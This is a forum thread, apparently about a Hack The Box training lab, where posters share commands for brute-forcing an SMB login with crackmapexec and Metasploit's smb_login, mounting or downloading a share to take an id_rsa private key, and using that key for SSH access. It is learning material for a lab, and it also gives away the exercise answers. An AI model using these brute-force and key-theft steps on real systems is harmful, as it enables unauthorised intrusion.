Every time I download GGL/id_rsa I get an empty file. Any help on how I can complete the last question? I have jason's password.
Ok, so I was stuck on this for a while. I found the answer not from the module; I utilized ChatGPT. It wasn't the most helpful, but it did lead me to get my answer. This is for question 3, so I am already assuming you have jason's PW… Use the following command to mount the G** share for the id_rsa:
sudo mount -t cifs //10.129.216.52/GGJ /mnt/smb_htb -o username=jason,password='PWFORJASON',ro
The ro at the end is for read-only.
Once the id_rsa is mounted to whatever path you decided, use this command to copy it to your home directory:
cp /mnt/smb_htb/id_rsa ~/id_rsa
Then, very important:
chmod 600 ~/id_rsa
Then, to sign into SSH with the private key, use:
ssh -i ~/id_rsa jason@10.129.216.52
Hope this helps.
For point 3:
You must use:
smbmap -u jason -p 'xxxxxx' -d GXX -H 10.129.xx.xx --download "Gxx\id_rsa"
chmod 600 id_rsa
and log in on the SSH server with the flag -i id_rsa
You're welcome!
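Added example, not part of the original posts: a small shell check for the two failure points raised in this thread, an empty id_rsa after download and a key file whose permissions ssh will not accept. The function name check_key and its return codes are assumptions made for this example.

```shell
#!/bin/sh
# check_key FILE: sanity-check a downloaded private key before using ssh -i.
# Return codes (chosen for this example):
#   0 ok, 1 missing, 2 empty, 3 not a private key, 4 mode too open
check_key() {
    key=$1
    [ -f "$key" ] || { echo "$key: no such file" >&2; return 1; }
    # An empty file means the download failed (the symptom in the first post).
    [ -s "$key" ] || { echo "$key: file is empty, download again" >&2; return 2; }
    # Private keys start with a "-----BEGIN ... PRIVATE KEY-----" header line.
    head -n 1 "$key" | grep -q '^-----BEGIN .*PRIVATE KEY-----' \
        || { echo "$key: does not look like a private key" >&2; return 3; }
    # ssh ignores a key that group or others can access, so both must be 0.
    # GNU stat first, BSD stat as fallback.
    mode=$(stat -c '%a' "$key" 2>/dev/null || stat -f '%Lp' "$key")
    case $mode in
        *00) ;;
        *) echo "$key: mode $mode too open, run chmod 600" >&2; return 4 ;;
    esac
    return 0
}
# Usage: check_key ~/id_rsa && ssh -i ~/id_rsa user@host
```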
I'm stuck on this, so do I download the id_rsa file using
smbmap -H 10.129.203.6 -u jason -p password.txt --download GGJ\id_rsa
From there, do I then use the command you did to mount, then change permissions, then sign in?
Hi, I tried this but I am stuck.
┌──(venv)─(kali㉿kali)-[/opt/CrackMapExec]
└─$ poetry run crackmapexec --verbose smb 10.129.92.239 --user jason -p /home/kali/Desktop/pws.list -d ATTCSVC-LINUX
[08:12:40] INFO Socket info: host=10.129.92.239, hostname=10.129.92.239, kerberos=False connection.py:95
[08:12:42] INFO Error creating SMBv1 connection to 10.129.92.239: (‘unpack requires a buffer of 1 bytes’, “When unpacking field ‘SecurityMode | <B | b’‘[:1]’”) smb.py:599
[08:12:45] INFO Error creating SMBv3 connection to 10.129.92.239: The NETBIOS connection with the remote host timed out.
Still stuck.
┌──(venv)─(kali㉿kali)-[/opt/CrackMapExec]
└─$ poetry run crackmapexec --verbose ftp 10.129.203.6 -u jason -p /home/kali/Desktop/pws.list --port 2121
[12:07:41] INFO Socket info: host=10.129.203.6, hostname=10.129.203.6, kerberos=False
I'm having a lot of trouble with this box. I keep receiving an NT_STATUS_IO_TIMEOUT, and on the rare times I managed to connect I'm unable to download the id_rsa file.
Try installing crackmapexec with pip and git. Here is the command you can use for that:
pip3 install git+https://github.com/Porchetta-Industries/CrackMapExec
This will take poetry out of the way and in my opinion makes the learning experience a little easier.
After CME is installed this way I found this syntax to work quite well without specifying domain but using --local-auth as mentioned above.
crackmapexec smb 10.129.101.59 -u j**** -p /path/to/wordlist --local-auth
Not saying one way is necessarily better than the other, this is just what worked for me. Hope this helps.
Hello Friend:
For those like me who don't have CME working in the HTB lab, you can do exercise 2 with Metasploit using the smb_login module.
Commands:
msfconsole -q
use auxiliary/scanner/smb/smb_login
set RHOST 10.129.190.47
set SMBUSER jason
set PASS_FILE Desktop/pws.list
set VERBOSE false
exploit
Important: use pws.list from resources.
Happy Hacking!